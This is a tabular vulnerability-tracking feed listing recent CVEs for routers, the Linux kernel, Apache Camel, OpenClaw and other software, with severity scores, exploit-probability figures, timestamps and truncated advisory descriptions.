| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-6799 | 6.3 | 1.41% | 1 | 0 | 2026-04-29T01:00:01.613000 | A security flaw has been discovered in Comfast CF-N1-S 2.6.0.1. Affected by this | |
| CVE-2026-7344 | 0 | 0.00% | 2 | 0 | 2026-04-28T23:16:21.987000 | Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727. | |
| CVE-2026-7343 | 0 | 0.00% | 2 | 0 | 2026-04-28T23:16:21.883000 | Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allo | |
| CVE-2026-42167 | 8.1 | 0.00% | 2 | 1 | 2026-04-28T23:16:20.610000 | mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary | |
| CVE-2026-41873 | 9.8 | 0.00% | 2 | 0 | 2026-04-28T22:16:49.900000 | ** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('H | |
| CVE-2026-41649 | 7.7 | 0.00% | 2 | 0 | 2026-04-28T22:16:49.747000 | Outline is a service that allows for collaborative documentation. The `shares.cr | |
| CVE-2026-38651 | 8.2 | 0.00% | 2 | 0 | 2026-04-28T21:37:12 | Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. | |
| CVE-2026-32202 | 4.3 | 0.09% | 8 | 0 | 2026-04-28T21:37:03 | Protection mechanism failure in Windows Shell allows an unauthorized attacker to | |
| CVE-2026-24222 | 8.6 | 0.00% | 4 | 0 | 2026-04-28T21:36:23 | NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initializati | |
| CVE-2026-24231 | 6.3 | 0.00% | 2 | 0 | 2026-04-28T21:36:22 | NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF prote | |
| CVE-2024-1708 | 8.5 | 53.66% | 4 | 3 | 2026-04-28T21:34:00 | ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner | |
| CVE-2026-7289 | 8.8 | 0.00% | 2 | 0 | 2026-04-28T20:25:44.987000 | A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the func | |
| CVE-2026-7288 | 8.8 | 0.00% | 2 | 0 | 2026-04-28T20:25:44.987000 | A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability aff | |
| CVE-2026-7204 | 9.8 | 0.89% | 3 | 0 | 2026-04-28T20:24:58.820000 | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This iss | |
| CVE-2026-7155 | 9.8 | 0.89% | 2 | 0 | 2026-04-28T20:24:58.820000 | A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b202005 | |
| CVE-2026-7154 | 9.8 | 0.89% | 1 | 0 | 2026-04-28T20:24:58.820000 | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. This aff | |
| CVE-2026-7244 | 9.8 | 0.89% | 1 | 0 | 2026-04-28T20:24:20.377000 | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The | |
| CVE-2026-7240 | 9.8 | 0.89% | 1 | 0 | 2026-04-28T20:24:20.377000 | A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This vul | |
| CVE-2026-3323 | 7.5 | 0.03% | 2 | 0 | 2026-04-28T20:23:20.703000 | An unsecured configuration interface on affected devices allows unauthenticated | |
| CVE-2026-5944 | 8.2 | 0.00% | 2 | 0 | 2026-04-28T20:23:20.703000 | An improper access control vulnerability exists in the Cisco Intersight Device C | |
| CVE-2026-7279 | 7.8 | 0.01% | 2 | 0 | 2026-04-28T20:22:38.260000 | AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowi | |
| CVE-2025-67223 | 7.5 | 0.00% | 2 | 1 | 2026-04-28T20:18:13.020000 | The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk be | |
| CVE-2026-27760 | 8.1 | 0.00% | 2 | 0 | 2026-04-28T20:18:13.020000 | OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in | |
| CVE-2026-32644 | 9.8 | 0.02% | 2 | 0 | 2026-04-28T20:11:56.713000 | Specific firmware versions of Milesight AIOT cameras use SSL certificates with d | |
| CVE-2026-20766 | 8.8 | 0.04% | 1 | 0 | 2026-04-28T20:11:56.713000 | An out-of-bounds memory access vulnerability exists in specific firmware version | |
| CVE-2026-40972 | 7.5 | 0.05% | 1 | 0 | 2026-04-28T20:11:56.713000 | An attacker on the same network as the remote application may be able to utilize | |
| CVE-2026-7321 | 9.6 | 0.00% | 2 | 0 | 2026-04-28T20:10:59.913000 | Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking co | |
| CVE-2026-7320 | 7.5 | 0.00% | 2 | 0 | 2026-04-28T20:10:59.913000 | Information disclosure due to incorrect boundary conditions in the Audio/Video c | |
| CVE-2026-24186 | 8.8 | 0.00% | 4 | 0 | 2026-04-28T20:10:42.070000 | NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause | |
| CVE-2026-24178 | 9.8 | 0.00% | 4 | 0 | 2026-04-28T20:10:42.070000 | NVIDIA NVFlare Dashboard contains a vulnerability in the user management and aut | |
| CVE-2026-24204 | 6.5 | 0.00% | 2 | 0 | 2026-04-28T20:10:42.070000 | NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Imprope | |
| CVE-2026-3893 | 9.4 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing a | |
| CVE-2026-41395 | 7.5 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 si | |
| CVE-2026-41404 | 8.8 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in | |
| CVE-2026-41396 | 7.8 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_B | |
| CVE-2026-41912 | 7.6 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vu | |
| CVE-2026-41405 | 7.5 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performi | |
| CVE-2026-42422 | 8.8 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.toke | |
| CVE-2026-41914 | 8.5 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in | |
| CVE-2026-42423 | 7.5 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that by | |
| CVE-2026-42432 | 7.8 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing | |
| CVE-2026-42431 | 8.1 | 0.00% | 2 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke | |
| CVE-2026-6785 | 8.1 | 0.07% | 1 | 0 | 2026-04-28T19:45:35.750000 | Memory safety bugs present in Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird | |
| CVE-2026-6786 | 8.1 | 0.06% | 1 | 0 | 2026-04-28T19:45:26.663000 | Memory safety bugs present in Firefox ESR 140.9, Thunderbird ESR 140.9, Firefox | |
| CVE-2026-40453 | 9.9 | 0.21% | 1 | 0 | 2026-04-28T19:43:55.047000 | The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy | |
| CVE-2026-40048 | 7.8 | 0.05% | 1 | 0 | 2026-04-28T19:43:29.363000 | The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `< | |
| CVE-2026-33454 | 9.4 | 0.04% | 1 | 0 | 2026-04-28T19:42:14.580000 | The Camel-Mail component is vulnerable to Camel message header injection. The cu | |
| CVE-2026-40022 | 8.2 | 0.06% | 1 | 0 | 2026-04-28T19:41:41.530000 | When authentication is enabled on the Apache Camel embedded HTTP server or embed | |
| CVE-2026-3854 | 8.8 | 0.39% | 40 | 3 | 2026-04-28T19:37:39.507000 | An improper neutralization of special elements vulnerability was identified in G | |
| CVE-2026-25874 | 9.8 | 0.06% | 4 | 0 | 2026-04-28T19:01:40.377000 | LeRobot through 0.5.1 contains an unsafe deserialization vulnerability in the as | |
| CVE-2026-41364 | 8.1 | 0.12% | 1 | 0 | 2026-04-28T18:45:44.107000 | OpenClaw before 2026.3.31 contains a symlink following vulnerability in SSH sand | |
| CVE-2026-41371 | 8.5 | 0.04% | 1 | 0 | 2026-04-28T18:44:10.780000 | OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat. | |
| CVE-2026-33277 | 8.8 | 0.23% | 2 | 0 | 2026-04-28T18:43:10.593000 | An OS command Injection issue exists in LogonTracer prior to v2.0.0. An arbitrar | |
| CVE-2026-41602 | 7.5 | 0.02% | 2 | 0 | 2026-04-28T18:40:25.530000 | Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport G | |
| CVE-2026-41472 | 6.1 | 0.67% | 1 | 0 | 2026-04-28T18:31:36 | CyberPanel versions prior to 2.4.4 contain a stored cross-site scripting vulnera | |
| CVE-2026-42426 | None | 0.00% | 2 | 0 | 2026-04-28T18:28:53 | ## Impact OpenClaw `node.pair.approve` placed in `operator.write` scope instead | |
| CVE-2026-41399 | None | 0.00% | 2 | 0 | 2026-04-28T18:22:28 | ## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket | |
| CVE-2026-41394 | None | 0.00% | 2 | 0 | 2026-04-28T18:20:50 | ## Summary Unauthenticated plugin-auth HTTP routes receive operator runtime scop | |
| CVE-2026-41387 | 9.7 | 0.00% | 2 | 0 | 2026-04-28T18:18:46 | ## Summary Host exec env override sanitization did not fail closed for several | |
| CVE-2026-41386 | None | 0.00% | 2 | 0 | 2026-04-28T18:18:23 | ## Summary Bootstrap setup codes were not bound to the intended device role and | |
| CVE-2026-41384 | None | 0.00% | 2 | 0 | 2026-04-28T18:17:40 | ## Summary Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable In | |
| CVE-2026-41383 | None | 0.00% | 2 | 0 | 2026-04-28T18:17:19 | ## Summary Before OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbi | |
| CVE-2026-41378 | None | 0.00% | 2 | 0 | 2026-04-28T18:15:32 | ## Summary Paired node escalates to gateway RCE via unrestricted node.event agen | |
| CVE-2026-7040 | 7.5 | 0.04% | 1 | 0 | 2026-04-28T15:16:33.807000 | Text::Minify::XS versions from v0.3.0 before v0.7.8 for Perl have a heap overflo | |
| CVE-2026-35431 | 10.0 | 0.07% | 2 | 0 | 2026-04-28T12:10:53.103000 | Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management | |
| CVE-2026-7243 | 9.8 | 0.89% | 1 | 0 | 2026-04-28T09:34:20 | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affe | |
| CVE-2026-7248 | 9.8 | 0.06% | 1 | 0 | 2026-04-28T09:34:20 | A vulnerability was found in D-Link DI-8100 16.07.26A1. This affects the functio | |
| CVE-2026-5201 | 7.5 | 0.09% | 1 | 1 | 2026-04-28T09:16:17.017000 | A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vuln | |
| CVE-2026-7202 | 9.8 | 0.89% | 2 | 0 | 2026-04-28T03:31:36 | A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This aff | |
| CVE-2026-7203 | 9.8 | 0.89% | 2 | 0 | 2026-04-28T03:31:36 | A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerab | |
| CVE-2026-27785 | 8.8 | 0.01% | 1 | 0 | 2026-04-28T00:31:47 | Specific firmware versions of Milesight AIOT camera firmware contain hard-coded | |
| CVE-2026-40976 | 9.1 | 0.04% | 1 | 0 | 2026-04-28T00:31:47 | In certain circumstances, Spring Boot's default web security is ineffective allo | |
| CVE-2026-7160 | 8.8 | 0.29% | 1 | 0 | 2026-04-28T00:31:47 | A vulnerability was determined in Tenda HG3 2.0. This vulnerability affects the | |
| CVE-2026-7156 | 9.8 | 0.89% | 2 | 0 | 2026-04-27T21:31:12 | A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. Affected i | |
| CVE-2026-7151 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T21:31:12 | A vulnerability was determined in Tenda HG3 2.0. Impacted is the function formUp | |
| CVE-2026-7153 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T21:31:12 | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The | |
| CVE-2026-30350 | 7.5 | 0.01% | 1 | 0 | 2026-04-27T21:31:02 | An issue in the /store/items/search endpoint of Agent Protocol server commit e9a | |
| CVE-2026-31662 | 7.5 | 0.05% | 1 | 0 | 2026-04-27T21:30:50 | In the Linux kernel, the following vulnerability has been resolved: tipc: fix b | |
| CVE-2026-6741 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T20:21:52.070000 | The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for W | |
| CVE-2026-7152 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T20:21:52.070000 | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affe | |
| CVE-2026-31637 | 9.8 | 0.05% | 1 | 0 | 2026-04-27T20:20:48.030000 | In the Linux kernel, the following vulnerability has been resolved: rxrpc: reje | |
| CVE-2026-31659 | 9.8 | 0.05% | 1 | 0 | 2026-04-27T20:17:17.613000 | In the Linux kernel, the following vulnerability has been resolved: batman-adv: | |
| CVE-2026-31657 | 9.8 | 0.06% | 1 | 0 | 2026-04-27T20:16:58.960000 | In the Linux kernel, the following vulnerability has been resolved: batman-adv: | |
| CVE-2026-31656 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T20:16:43.370000 | In the Linux kernel, the following vulnerability has been resolved: drm/i915/gt | |
| CVE-2026-31652 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T20:16:12.663000 | In the Linux kernel, the following vulnerability has been resolved: mm/damon/st | |
| CVE-2026-31650 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T20:14:35.180000 | In the Linux kernel, the following vulnerability has been resolved: mmc: vub300 | |
| CVE-2026-31649 | 9.8 | 0.05% | 1 | 0 | 2026-04-27T20:13:49.587000 | In the Linux kernel, the following vulnerability has been resolved: net: stmmac | |
| CVE-2026-31648 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T20:13:14.333000 | In the Linux kernel, the following vulnerability has been resolved: mm: filemap | |
| CVE-2026-31669 | 9.8 | 0.07% | 1 | 0 | 2026-04-27T20:09:25.553000 | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix | |
| CVE-2026-31668 | 9.8 | 0.05% | 1 | 0 | 2026-04-27T20:08:54.307000 | In the Linux kernel, the following vulnerability has been resolved: seg6: separ | |
| CVE-2026-31667 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T20:00:40.187000 | In the Linux kernel, the following vulnerability has been resolved: Input: uinp | |
| CVE-2026-31666 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T20:00:27.157000 | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix | |
| CVE-2026-31665 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T20:00:05.430000 | In the Linux kernel, the following vulnerability has been resolved: netfilter: | |
| CVE-2026-40372 | 9.1 | 0.03% | 2 | 0 | 2026-04-27T19:57:39.360000 | Improper verification of cryptographic signature in ASP.NET Core allows an unaut | |
| CVE-2026-42039 | 7.5 | 0.04% | 1 | 0 | 2026-04-27T19:50:46.320000 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15. | |
| CVE-2026-30352 | 9.8 | 0.27% | 1 | 0 | 2026-04-27T19:18:46.690000 | A remote code execution (RCE) vulnerability in the /devserver/start endpoint of | |
| CVE-2026-41635 | 9.8 | 0.05% | 2 | 0 | 2026-04-27T18:57:20.293000 | Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them | |
| CVE-2026-5942 | 5.5 | 0.01% | 1 | 0 | 2026-04-27T18:57:20.293000 | Flaws in page lifecycle management allow document structure changes to desynchro | |
| CVE-2026-41409 | 9.8 | 0.05% | 2 | 0 | 2026-04-27T18:57:20.293000 | The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incom | |
| CVE-2026-3008 | 6.6 | 0.01% | 1 | 3 | 2026-04-27T18:57:20.293000 | Successful exploitation of the string injection vulnerability could allow an att | |
| CVE-2025-69689 | 8.8 | 0.01% | 1 | 0 | 2026-04-27T18:57:20.293000 | The Fan Control application V251 contains an improper privilege handling vulnera | |
| CVE-2026-7100 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T18:57:20.293000 | A flaw has been found in Tenda F456 1.0.0.5. The impacted element is the functio | |
| CVE-2026-7099 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T18:57:20.293000 | A vulnerability was detected in Tenda F456 1.0.0.5. The affected element is the | |
| CVE-2026-5943 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T18:57:20.293000 | Document structural anomalies caused inconsistencies between page element relati | |
| CVE-2026-5940 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T18:57:20.293000 | Calling a function that triggers a UI refresh after removing comments via a scri | |
| CVE-2026-7119 | 8.8 | 0.29% | 1 | 0 | 2026-04-27T18:57:20.293000 | A vulnerability was detected in Tenda HG3 2.0. The impacted element is an unknow | |
| CVE-2026-7098 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T18:57:20.293000 | A security vulnerability has been detected in Tenda F456 1.0.0.5. Impacted is th | |
| CVE-2026-7080 | 8.8 | 0.05% | 2 | 0 | 2026-04-27T18:57:20.293000 | A security vulnerability has been detected in Tenda F456 1.0.0.5. This impacts t | |
| CVE-2026-3868 | 0 | 0.09% | 1 | 0 | 2026-04-27T18:57:20.293000 | An improper handling of the length parameter inconsistency vulnerability has bee | |
| CVE-2026-7081 | 8.8 | 0.05% | 2 | 0 | 2026-04-27T18:57:20.293000 | A vulnerability was detected in Tenda F456 1.0.0.5. Affected is the function fro | |
| CVE-2026-7078 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T18:57:20.293000 | A security flaw has been discovered in Tenda F456 1.0.0.5. The impacted element | |
| CVE-2026-42363 | 9.3 | 0.03% | 2 | 0 | 2026-04-27T18:57:20.293000 | An insufficient encryption vulnerability exists in the Device Authentication fun | |
| CVE-2026-7055 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T18:57:20.293000 | A security vulnerability has been detected in Tenda F456 1.0.0.5. This issue aff | |
| CVE-2026-7057 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T18:57:20.293000 | A flaw has been found in Tenda F456 1.0.0.5. The affected element is an unknown | |
| CVE-2026-7106 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T18:38:48.527000 | The Highland Software Custom Role Manager plugin for WordPress is vulnerable to | |
| CVE-2026-22337 | 9.8 | 0.04% | 1 | 0 | 2026-04-27T18:37:59.213000 | Incorrect Privilege Assignment vulnerability in Directorist Directorist Social L | |
| CVE-2026-7124 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T18:36:42.937000 | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. Affected | |
| CVE-2026-7123 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T18:36:42.937000 | A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. Affected is t | |
| CVE-2026-41463 | 8.8 | 0.42% | 1 | 0 | 2026-04-27T18:36:19.637000 | ProjeQtor versions 7.0 through 12.4.3 contain a ZipSlip path traversal vulnerabi | |
| CVE-2026-41462 | 9.8 | 0.09% | 1 | 1 | 2026-04-27T18:36:19.637000 | ProjeQtor versions 7.0 through 12.4.3 contain an unauthenticated SQL injection v | |
| CVE-2026-7137 | 9.8 | 0.89% | 2 | 0 | 2026-04-27T18:35:53.583000 | A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b202005 | |
| CVE-2026-7139 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T18:35:53.583000 | A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This issue affect | |
| CVE-2026-7138 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T18:35:53.583000 | A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. This vulne | |
| CVE-2026-31673 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T18:32:22.917000 | In the Linux kernel, the following vulnerability has been resolved: af_unix: re | |
| CVE-2026-31682 | 9.1 | 0.07% | 1 | 0 | 2026-04-27T18:32:22.917000 | In the Linux kernel, the following vulnerability has been resolved: bridge: br_ | |
| CVE-2026-31680 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T18:32:22.917000 | In the Linux kernel, the following vulnerability has been resolved: net: ipv6: | |
| CVE-2026-31678 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T18:32:22.917000 | In the Linux kernel, the following vulnerability has been resolved: openvswitch | |
| CVE-2026-31676 | 7.5 | 0.04% | 1 | 0 | 2026-04-27T18:32:22.917000 | In the Linux kernel, the following vulnerability has been resolved: rxrpc: only | |
| CVE-2026-31675 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T18:32:22.917000 | In the Linux kernel, the following vulnerability has been resolved: net/sched: | |
| CVE-2026-31685 | 9.4 | 0.05% | 1 | 0 | 2026-04-27T18:32:22.917000 | In the Linux kernel, the following vulnerability has been resolved: netfilter: | |
| CVE-2026-38934 | 8.8 | 0.02% | 2 | 1 | 2026-04-27T18:32:15 | Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2. | |
| CVE-2026-7140 | 9.8 | 0.89% | 2 | 0 | 2026-04-27T18:32:15 | A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. Impacted | |
| CVE-2026-7136 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T18:32:15 | A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Affected | |
| CVE-2026-30351 | 7.5 | 0.01% | 1 | 0 | 2026-04-27T18:32:07 | A path traversal vulnerability in the UI/static component of leonvanzyl autocode | |
| CVE-2026-40860 | 9.8 | 0.39% | 2 | 0 | 2026-04-27T18:32:05 | JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding clas | |
| CVE-2026-41176 | 9.8 | 6.30% | 1 | 0 | template | 2026-04-27T18:19:45.303000 | Rclone is a command-line program to sync files and directories to and from diffe |
| CVE-2026-38834 | 7.3 | 13.21% | 1 | 0 | 2026-04-27T16:44:38.997000 | Tenda W30E V2.0 V16.01.0.21 was found to contain a command injection vulnerabili | |
| CVE-2026-40858 | 8.8 | 0.08% | 2 | 1 | 2026-04-27T15:31:59 | The camel-infinispan component's ProtoStream-based remote aggregation repository | |
| CVE-2026-33453 | 10.0 | 0.51% | 1 | 1 | 2026-04-27T15:31:59 | Improperly Controlled Modification of Dynamically-Determined Object Attributes v | |
| CVE-2026-31663 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T15:31:55 | In the Linux kernel, the following vulnerability has been resolved: xfrm: hold | |
| CVE-2026-7125 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T15:31:00 | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. Affected | |
| CVE-2026-31683 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T15:30:52 | In the Linux kernel, the following vulnerability has been resolved: batman-adv: | |
| CVE-2026-40473 | 8.8 | 0.08% | 2 | 1 | 2026-04-27T15:30:52 | The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter | |
| CVE-2026-7121 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T12:30:49 | A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the | |
| CVE-2026-7122 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T12:30:49 | A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This imp | |
| CVE-2026-5941 | 7.8 | 0.02% | 1 | 0 | 2026-04-27T12:30:45 | Parsing logic flaws cause non-signature data to be misidentified as valid signat | |
| CVE-2026-22336 | 9.3 | 0.03% | 1 | 0 | 2026-04-27T12:30:44 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
| CVE-2026-7101 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T09:34:46 | A vulnerability has been found in Tenda F456 1.0.0.5. This affects the function | |
| CVE-2026-42379 | 7.7 | 0.03% | 1 | 0 | 2026-04-27T09:34:46 | Insertion of Sensitive Information Into Sent Data vulnerability in WPDeveloper T | |
| CVE-2026-7097 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T09:34:46 | A weakness has been identified in Tenda F456 1.0.0.5. This issue affects the fun | |
| CVE-2026-7096 | 8.8 | 0.29% | 1 | 0 | 2026-04-27T09:34:46 | A security flaw has been discovered in Tenda HG3 2.0 300003070. This vulnerabili | |
| CVE-2026-7082 | 8.8 | 0.05% | 2 | 0 | 2026-04-27T06:31:33 | A flaw has been found in Tenda F456 1.0.0.5. Affected by this vulnerability is t | |
| CVE-2026-7079 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T03:30:34 | A weakness has been identified in Tenda F456 1.0.0.5. This affects the function | |
| CVE-2026-7069 | 8.0 | 0.03% | 1 | 0 | 2026-04-27T00:30:33 | A security flaw has been discovered in D-Link DIR-825 up to 3.00b32. This impact | |
| CVE-2026-7068 | 8.8 | 0.03% | 1 | 0 | 2026-04-27T00:30:33 | A vulnerability was identified in D-Link DIR-825 3.00b32. This affects the funct | |
| CVE-2026-7056 | 8.8 | 0.09% | 1 | 0 | 2026-04-27T00:30:33 | A vulnerability was detected in Tenda F456 1.0.0.5. Impacted is the function fro | |
| CVE-2026-7054 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T00:30:33 | A weakness has been identified in Tenda F456 1.0.0.5. This vulnerability affects | |
| CVE-2026-7053 | 8.8 | 0.05% | 1 | 0 | 2026-04-27T00:30:33 | A security flaw has been discovered in Tenda F456 1.0.0.5. This affects the func | |
| CVE-2026-7037 | 9.8 | 0.89% | 1 | 0 | 2026-04-26T12:31:47 | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. Thi | |
| CVE-2026-24467 | 9.0 | 0.90% | 1 | 0 | 2026-04-25T18:00:57.917000 | OpenAEV is an open source platform allowing organizations to plan, schedule and | |
| CVE-2026-40887 | 9.1 | 5.38% | 1 | 0 | template | 2026-04-24T21:10:19 | ## Summary An unauthenticated SQL injection vulnerability exists in the Vendure |
| CVE-2026-41651 | 8.8 | 0.20% | 4 | 5 | 2026-04-24T13:43:37.347000 | PackageKit is a a D-Bus abstraction layer that allows the user to manage package | |
| CVE-2026-5450 | 9.8 | 0.05% | 2 | 0 | 2026-04-23T18:32:57 | Calling the scanf family of functions with a %mc (malloc'd character match) in t | |
| CVE-2026-3844 | 9.8 | 0.06% | 2 | 4 | 2026-04-23T14:28:55.557000 | The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads du | |
| CVE-2026-33626 | 7.5 | 0.04% | 2 | 0 | 2026-04-23T13:39:54.420000 | LMDeploy is a toolkit for compressing, deploying, and serving large language mod | |
| CVE-2026-41179 | None | 8.21% | 1 | 0 | template | 2026-04-23T10:52:57 | ### Summary The RC endpoint `operations/fsinfo` is exposed without `AuthRequired |
| CVE-2026-21571 | 0 | 1.17% | 1 | 0 | 2026-04-22T21:24:26.997000 | This Critical severity OS Command Injection vulnerability was introduced in vers | |
| CVE-2026-22007 | 2.9 | 0.02% | 1 | 0 | 2026-04-22T15:31:39 | Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Ente | |
| CVE-2026-6770 | 6.5 | 0.06% | 2 | 1 | 2026-04-22T15:07:23.650000 | Other issue in the Storage: IndexedDB component. This vulnerability was fixed in | |
| CVE-2019-25714 | None | 0.78% | 1 | 0 | 2026-04-21T18:32:04 | Seeyon OA A8 contains an unauthenticated arbitrary file write vulnerability in t | |
| CVE-2026-5965 | 9.8 | 8.66% | 1 | 0 | 2026-04-21T06:30:32 | NewSoftOA developed by NewSoft has an OS Command Injection vulnerability, allowi | |
| CVE-2026-35177 | 4.1 | 0.01% | 1 | 0 | 2026-04-20T18:28:03.593000 | Vim is an open source, command line text editor. Prior to 9.2.0280, a path trave | |
| CVE-2026-4747 | 8.8 | 0.09% | 1 | 2 | 2026-04-20T13:47:31.163000 | Each RPCSEC_GSS data packet is validated by a routine which checks a signature i | |
| CVE-2025-61260 | 9.8 | 0.10% | 2 | 0 | 2026-04-17T15:24:57.753000 | A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enabl | |
| CVE-2026-20148 | 4.9 | 0.06% | 2 | 0 | 2026-04-17T15:09:46.880000 | A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem | |
| CVE-2026-20147 | 9.9 | 0.28% | 2 | 0 | 2026-04-17T15:09:46.880000 | A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem | |
| CVE-2026-5588 | None | 0.01% | 2 | 0 | 2026-04-16T21:32:20 | : Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of th | |
| CVE-2025-29787 | 0 | 0.33% | 2 | 0 | 2026-04-15T00:35:42.020000 | `zip` is a zip library for rust which supports reading and writing of simple ZIP | |
| CVE-2026-35414 | 4.2 | 0.02% | 2 | 1 | 2026-04-02T18:31:50 | OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon | |
